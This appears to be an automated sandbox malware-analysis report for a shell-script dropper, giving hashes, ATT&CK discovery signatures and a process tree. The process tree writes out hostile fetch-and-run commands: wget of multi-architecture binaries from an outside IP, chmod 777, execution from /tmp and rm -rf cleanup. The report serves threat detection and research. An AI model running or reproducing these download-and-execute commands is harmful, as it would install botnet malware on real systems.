ac40e30ea6ab94b1102940d16c575f7c87dbe6335530e37f568c4ac2d967f53d

Analysis

max time kernel
147s
max time network
149s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
02-07-2024 05:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

qkdjdjj22.sh
Size

1KB
MD5

536b6c9024361ab349363a6a55c2a2b8
SHA1

d0aec54b19e3e9c9cd68dafe08c4cb6525d8435a
SHA256

ac40e30ea6ab94b1102940d16c575f7c87dbe6335530e37f568c4ac2d967f53d
SHA512

731b4d784a0b56464dba291fd0e43ee4f99cb2457c54cb91af21ee4c339aecc204c8a9dd592ba87017657752fdcbc6d4b6856f01dbbceefebcfc27affc673954

Score

6^/10

Malware Config

Signatures

Reads system routing table 1 TTPs 4 IoCs

Gets active network interfaces from /proc virtual filesystem.

System Network Configuration Discovery

T1016

Processes:

qkdjdjj22.arm6qkdjdjj22.ppcqkdjdjj22.ppcqkdjdjj22.arm4

description	ioc	process
File opened for reading	/proc/net/route	qkdjdjj22.arm6
File opened for reading	/proc/net/route	qkdjdjj22.ppc
File opened for reading	/proc/net/route	qkdjdjj22.ppc
File opened for reading	/proc/net/route	qkdjdjj22.arm4

Reads system network configuration 1 TTPs 4 IoCs

Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery

T1016

Processes:

qkdjdjj22.arm6qkdjdjj22.ppcqkdjdjj22.ppcqkdjdjj22.arm4

description	ioc	process
File opened for reading	/proc/net/route	qkdjdjj22.arm6
File opened for reading	/proc/net/route	qkdjdjj22.ppc
File opened for reading	/proc/net/route	qkdjdjj22.ppc
File opened for reading	/proc/net/route	qkdjdjj22.arm4

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwget

description	ioc	process
File opened for modification	/tmp/qkdjdjj22.mpsl	wget
File opened for modification	/tmp/qkdjdjj22.sh4	wget
File opened for modification	/tmp/qkdjdjj22.x86	wget
File opened for modification	/tmp/qkdjdjj22.x32	wget
File opened for modification	/tmp/qkdjdjj22.ppc	wget
File opened for modification	/tmp/qkdjdjj22.i586	wget
File opened for modification	/tmp/qkdjdjj22.mips	wget
File opened for modification	/tmp/qkdjdjj22.arm6	wget
File opened for modification	/tmp/qkdjdjj22.m68k	wget
File opened for modification	/tmp/qkdjdjj22.ppc.1	wget
File opened for modification	/tmp/qkdjdjj22.arm4	wget

/tmp/qkdjdjj22.sh
/tmp/qkdjdjj22.sh
1⤵
PID:638

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.mips
2⤵
- Writes file to tmp directory
PID:645

/bin/chmod
chmod 777 qkdjdjj22.mips
2⤵
PID:667

/tmp/qkdjdjj22.mips
./qkdjdjj22.mips
2⤵
PID:668

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.mpsl
2⤵
- Writes file to tmp directory
PID:671

/bin/chmod
chmod 777 qkdjdjj22.mpsl
2⤵
PID:673

/tmp/qkdjdjj22.mpsl
./qkdjdjj22.mpsl
2⤵
PID:674

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.sh4
2⤵
- Writes file to tmp directory
PID:676

/bin/chmod
chmod 777 qkdjdjj22.sh4
2⤵
PID:682

/tmp/qkdjdjj22.sh4
./qkdjdjj22.sh4
2⤵
PID:684

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.x86
2⤵
- Writes file to tmp directory
PID:686

/bin/chmod
chmod 777 qkdjdjj22.x86
2⤵
PID:700

/tmp/qkdjdjj22.x86
./qkdjdjj22.x86
2⤵
PID:702

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.arm6
2⤵
- Writes file to tmp directory
PID:704

/bin/chmod
chmod 777 qkdjdjj22.arm6
2⤵
PID:730

/tmp/qkdjdjj22.arm6
./qkdjdjj22.arm6
2⤵
- Reads system routing table
- Reads system network configuration
PID:731

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.x32
2⤵
- Writes file to tmp directory
PID:734

/bin/chmod
chmod 777 qkdjdjj22.x32
2⤵
PID:735

/tmp/qkdjdjj22.x32
./qkdjdjj22.x32
2⤵
PID:736

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.ppc
2⤵
- Writes file to tmp directory
PID:738

/bin/chmod
chmod 777 qkdjdjj22.ppc
2⤵
PID:761

/tmp/qkdjdjj22.ppc
./qkdjdjj22.ppc
2⤵
- Reads system routing table
- Reads system network configuration
PID:762

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.i586
2⤵
- Writes file to tmp directory
PID:765

/bin/chmod
chmod 777 qkdjdjj22.i586
2⤵
PID:774

/tmp/qkdjdjj22.i586
./qkdjdjj22.i586
2⤵
PID:775

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.m68k
2⤵
- Writes file to tmp directory
PID:777

/bin/chmod
chmod 777 qkdjdjj22.m68k
2⤵
PID:778

/tmp/qkdjdjj22.m68k
./qkdjdjj22.m68k
2⤵
PID:779

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.ppc
2⤵
- Writes file to tmp directory
PID:781

/bin/chmod
chmod 777 qkdjdjj22.ppc
2⤵
PID:782

/tmp/qkdjdjj22.ppc
./qkdjdjj22.ppc
2⤵
- Reads system routing table
- Reads system network configuration
PID:783

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.arm4
2⤵
- Writes file to tmp directory
PID:786

/bin/chmod
chmod 777 qkdjdjj22.arm4
2⤵
PID:787

/tmp/qkdjdjj22.arm4
./qkdjdjj22.arm4
2⤵
- Reads system routing table
- Reads system network configuration
PID:788

/usr/bin/wget
wget http://195.85.205.47/qkdjdjj22.arm5
2⤵
PID:791

/bin/rm
rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86
2⤵
PID:792

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

memory/686-1-0xb6718000-0xb6729044-memory.dmp

Download